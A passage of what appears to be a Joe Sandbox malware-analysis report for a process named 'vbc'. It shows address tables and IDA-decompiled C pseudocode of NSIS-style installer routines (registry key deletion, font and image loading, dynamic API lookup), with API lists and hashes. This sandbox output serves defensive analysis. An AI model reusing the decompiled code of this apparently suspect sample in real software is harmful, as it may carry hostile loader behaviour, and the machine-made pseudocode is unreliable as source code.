                                                0x73281b31
                                                0x00000000
                                                0x73281b31
                                                0x73281b4f
                                                0x73281b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281b51
                                                0x73281b3d
                                                0x73281b41
                                                0x00000000
                                                0x73281b41
                                                0x73281ab6
                                                0x73281ab6
                                                0x73281ab7
                                                0x73281b26
                                                0x73281b28
                                                0x00000000
                                                0x00000000
                                                0x73281b2a
                                                0x73281b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281b2d
                                                0x73281ab9
                                                0x73281ab9
                                                0x73281aba
                                                0x73281af7
                                                0x73281afc
                                                0x73281b19
                                                0x73281b1c
                                                0x00000000
                                                0x00000000
                                                0x73281b1e
                                                0x00000000
                                                0x00000000
                                                0x73281b20
                                                0x73281b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281b24
                                                0x73281afe
                                                0x73281b03
                                                0x73281b05
                                                0x73281b07
                                                0x73281b09
                                                0x73281b12
                                                0x73281b0b
                                                0x73281b0b
                                                0x73281b0b
                                                0x00000000
                                                0x73281b09
                                                0x73281abc
                                                0x73281abc
                                                0x73281abf
                                                0x73281af0
                                                0x73281af2
                                                0x00000000
                                                0x73281af2
                                                0x73281ac1
                                                0x73281ac1
                                                0x73281ac4
                                                0x73281ad7
                                                0x73281adc
                                                0x73281ae9
                                                0x73281aeb
                                                0x00000000
                                                0x73281aeb
                                                0x73281ade
                                                0x73281ae0
                                                0x00000000
                                                0x00000000
                                                0x73281ae2
                                                0x73281ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281ae7
                                                0x73281ac7
                                                0x73281ac8
                                                0x73281ace
                                                0x73281ad0
                                                0x73281ad0
                                                0x00000000
                                                0x73281ac8
                                                0x732819ef
                                                0x73281a68
                                                0x73281a6a
                                                0x73281a6d
                                                0x73281a8b
                                                0x73281a8e
                                                0x73281a94
                                                0x73281a99
                                                0x73281a6f
                                                0x73281a6f
                                                0x73281a73
                                                0x73281a77
                                                0x73281a79
                                                0x73281a79
                                                0x73281a9c
                                                0x73281aa0
                                                0x00000000
                                                0x73281aa6
                                                0x73281aa6
                                                0x73281aa9
                                                0x00000000
                                                0x73281aa9
                                                0x73281aa0
                                                0x732819f1
                                                0x732819f4
                                                0x73281a59
                                                0x73281a5b
                                                0x73281a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281a63
                                                0x732819f6
                                                0x732819f9
                                                0x00000000
                                                0x00000000
                                                0x732819fb
                                                0x732819fc
                                                0x73281a32
                                                0x73281a37
                                                0x73281a4f
                                                0x73281a51
                                                0x00000000
                                                0x73281a51
                                                0x73281a39
                                                0x73281a3b
                                                0x00000000
                                                0x00000000
                                                0x73281a41
                                                0x73281a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281a4a
                                                0x732819fe
                                                0x73281a01
                                                0x73281a28
                                                0x00000000
                                                0x73281a03
                                                0x73281a03
                                                0x73281a04
                                                0x73281a18
                                                0x73281a1a
                                                0x73281a06
                                                0x73281a08
                                                0x73281a0e
                                                0x73281a10
                                                0x73281a10
                                                0x73281a08
                                                0x00000000
                                                0x73281a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: fac573545b5c4f5aa7fa181a102ba05209c8c2bdeb0ae0f1edf0b1a540345066
                                                • Instruction ID: 2f3065ae273deb59b454a12a6298ab46455d55243d5b5f681912ee59548531d7
                                                • Opcode Fuzzy Hash: fac573545b5c4f5aa7fa181a102ba05209c8c2bdeb0ae0f1edf0b1a540345066
                                                • Instruction Fuzzy Hash: BA51E732F1021AABDB069FACC4447DEBBBAEB44310F18815AD406B32D4F6B5B9C5C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E73282480(void* __edx) {
                                                				void* _t37;
                                                				signed int _t38;
                                                				void* _t39;
                                                				void* _t41;
                                                				signed char* _t42;
                                                				signed char* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[0x18];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t41 = 0x1a;
                                                					if(_t52 == _t41) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[0x18] = _t41;
                                                							goto L12;
                                                						} else {
                                                							_t37 = E7328135A(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t37 = E732812E3();
                                                						L11:
                                                						_t52 = _t37;
                                                						L12:
                                                						_t13 =  &(_t51[8]); // 0x1020
                                                						_t42 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t38 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = 0;
                                                						if(_t38 > 7) {
                                                							L27:
                                                							_t39 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t39;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t38 * 4 +  &M732825F8))) {
                                                								case 0:
                                                									 *_t42 = 0;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E732813B1(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E732813B1(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x7328506c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7328506c, __eax,  *0x7328506c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E732812CC(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if( *__ebp != __cx) {
                                                										__eax = E732813B1(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x7328506c =  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18;
                                                									 *__ebx =  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E73281510(__edx,  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18, __edx,  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t37 = E732812CC(0x73285044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x73282494
                                                0x73282498
                                                0x732824a3
                                                0x732824a3
                                                0x732824aa
                                                0x732824af
                                                0x00000000
                                                0x00000000
                                                0x732824b3
                                                0x732824b6
                                                0x00000000
                                                0x00000000
                                                0x732824bb
                                                0x732824c6
                                                0x732824d6
                                                0x00000000
                                                0x732824cd
                                                0x732824cf
                                                0x732824e5
                                                0x00000000
                                                0x732824e5
                                                0x732824bd
                                                0x732824bd
                                                0x732824e6
                                                0x732824e6
                                                0x732824e8
                                                0x732824ec
                                                0x732824ec
                                                0x732824ef
                                                0x732824ef
                                                0x732824f7
                                                0x732824ff
                                                0x73282502
                                                0x732825c1
                                                0x732825c2
                                                0x732825cd
                                                0x732825f7
                                                0x732825f7
                                                0x732825dd
                                                0x732825e9
                                                0x732825df
                                                0x732825df
                                                0x732825df
                                                0x00000000
                                                0x73282508
                                                0x73282508
                                                0x00000000
                                                0x7328250f
                                                0x00000000
                                                0x00000000
                                                0x73282517
                                                0x00000000
                                                0x00000000
                                                0x73282525
                                                0x73282527
                                                0x00000000
                                                0x00000000
                                                0x73282548
                                                0x7328254e
                                                0x73282551
                                                0x73282553
                                                0x73282563
                                                0x00000000
                                                0x00000000
                                                0x73282530
                                                0x73282535
                                                0x73282538
                                                0x73282539
                                                0x00000000
                                                0x00000000
                                                0x7328256f
                                                0x73282575
                                                0x73282576
                                                0x73282579
                                                0x7328257a
                                                0x7328257c
                                                0x00000000
                                                0x00000000
                                                0x73282588
                                                0x7328258b
                                                0x73282597
                                                0x73282599
                                                0x00000000
                                                0x00000000
                                                0x732825a5
                                                0x732825b1
                                                0x732825b4
                                                0x732825b6
                                                0x732825b9
                                                0x00000000
                                                0x00000000
                                                0x73282508
                                                0x73282502
                                                0x732824db
                                                0x732824e0
                                                0x00000000
                                                0x732824e0

                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 732825C2
                                                  • Part of subcall function 732812CC: lstrcpynW.KERNEL32(00000000,?,7328137F,00000019,732811CA,-000000A0), ref: 732812DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 73282548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73282563
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: be19d93953eb7dd818449451899f3c558546e6638895d4c0731c97430093dc97
                                                • Instruction ID: 35ab77e44c613133930b6aceebc56fc9d5167dad3f7b76c25f2f07bda146a88a
                                                • Opcode Fuzzy Hash: be19d93953eb7dd818449451899f3c558546e6638895d4c0731c97430093dc97
                                                • Instruction Fuzzy Hash: 0D419CB110931ADFE719EF259844BE677F8FB48310F20891DE84A865C1E778A5C4DB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				short _v536;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v536);
                                                						_push(0);
                                                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v536);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E0040690A(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyW(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				WCHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t60;
                                                				long _t63;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                				} else {
                                                					E00402D84(2);
                                                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x24);
                                                				 *(_t65 + 8) = _t30;
                                                				_t60 = _t55 & 0x00000004;
                                                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402DA6(0x11);
                                                				}
                                                				 *(_t65 - 0x44) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                				asm("sbb esi, esi");
                                                				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                					_push(_t63);
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                • GetClientRect.USER32 ref: 00401DE5
                                                • LoadImageW.USER32 ref: 00401E15
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
                                                				void* __edi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				void* _t31;
                                                				struct HDC__* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t33 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402D84(2);
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t33);
                                                				 *0x40ce00 = E00402D84(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				 *0x40ce07 = 1;
                                                				 *0x40ce04 = _t15 & 0x00000001;
                                                				 *0x40ce05 = _t15 & 0x00000002;
                                                				 *0x40ce06 = _t15 & 0x00000004;
                                                				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                				_t18 = CreateFontIndirectW(0x40cdf0);
                                                				_push(_t18);
                                                				_push(_t31);
                                                				E00406484();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32 ref: 00401E73
                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000), ref: 00406779
                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E732816BD(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x732816d7
                                                0x732816e3
                                                0x732816f0
                                                0x732816f7
                                                0x73281700
                                                0x7328170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732822D8,?,00000808), ref: 732816D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732822D8,?,00000808), ref: 732816DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732822D8,?,00000808), ref: 732816F0
                                                • GetProcAddress.KERNEL32(732822D8,00000000,?,00000000,732822D8,?,00000808), ref: 732816F7
                                                • GlobalFree.KERNEL32(00000000), ref: 73281700
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: b36f37ea9bdec25e6d85313484d1ca601bd530c20be1503a2dbafeab9ada48d4
                                                • Instruction ID: 87f744e47864dba006a378ebab0265f89643c481e62591d74499a9f1d0f9563b
                                                • Opcode Fuzzy Hash: b36f37ea9bdec25e6d85313484d1ca601bd530c20be1503a2dbafeab9ada48d4
                                                • Instruction Fuzzy Hash: B9F0AC732061387FD62126A78C4CEEBBE9CDF8B3F5B214215F62C9219086615D01E7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t63;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402D84(3);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 - 0x18) = _t29;
                                                				_t30 = E00402D84(4);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402DA6(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t61 = E00402DA6();
                                                					_t32 = E00402DA6();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t61;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t63 = E00402D84();
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t41 = E00402D84(2);
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t56 =  *(_t64 - 0x1c) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x38) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
